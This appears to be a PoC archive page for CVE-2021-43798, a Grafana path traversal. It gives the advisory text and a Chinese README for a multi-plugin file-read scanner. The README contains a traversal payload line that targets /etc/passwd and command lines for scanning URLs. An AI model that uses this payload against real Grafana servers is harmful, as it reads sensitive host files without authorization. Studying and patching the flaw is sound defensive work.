Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-43798 PoC — Grafana path traversal

Source
https://github.com/MoCh3n/CVE-2021-43798-grafana_fileread
Associated Vulnerability
Title:Grafana path traversal (CVE-2021-43798)
Description:Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) iss vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: `<grafana_host_url>/public/plugins//`, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
Description
grafana CVE-2021-43798任意文件读取漏洞POC,采用多插件轮训检测的方法,允许指定单URL和从文件中读取URL
Readme
# CVE-2021-43798-grafana_fileread
**如果对象经过反向代理处理,可以将payload替换成这条**
```
url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"
```
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。  
Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。 

CVE: CVE-2021-43798     
组件: Grafana 
漏洞类型: 文件读取  
影响: 获取敏感信息  
简述: 未授权的攻击者利用该漏洞,能够获取服务器敏感文件 

# 使用说明
1、对单个URL进行检测
```
python3 grafana_fileread.py -u http://localhost:3000
```
![image](https://user-images.githubusercontent.com/62680449/145163470-5f0758dc-9614-4572-a163-b900fc19564d.png)
获取到的数据能够在grafana 8.x_fileread_vuln.txt文件中查看
![image](https://user-images.githubusercontent.com/62680449/145163393-fc08d974-703e-496b-94cf-cde75e394929.png)
2、对文件内的IP进行检测
```
python3 grafana_fileread.py -u http://localhost:3000
```
![image](https://user-images.githubusercontent.com/62680449/145163579-1233da26-85e7-4cda-a05c-58e521eeb1b4.png)

3、-h 查看帮助
![image](https://user-images.githubusercontent.com/62680449/145163618-6c1c33d9-bf2a-4880-8ce2-d18d405fd4ee.png)
File Snapshot

 [4.0K]  /data/pocs/e9ccff09cba52a9d8a5e5a5a4e71f37c3606f0c6
├── [3.4K]  grafana_fileread.py
├── [ 456]  plugins.txt
├── [1.4K]  README.md
└── [  22]  urls.txt

1 directory, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →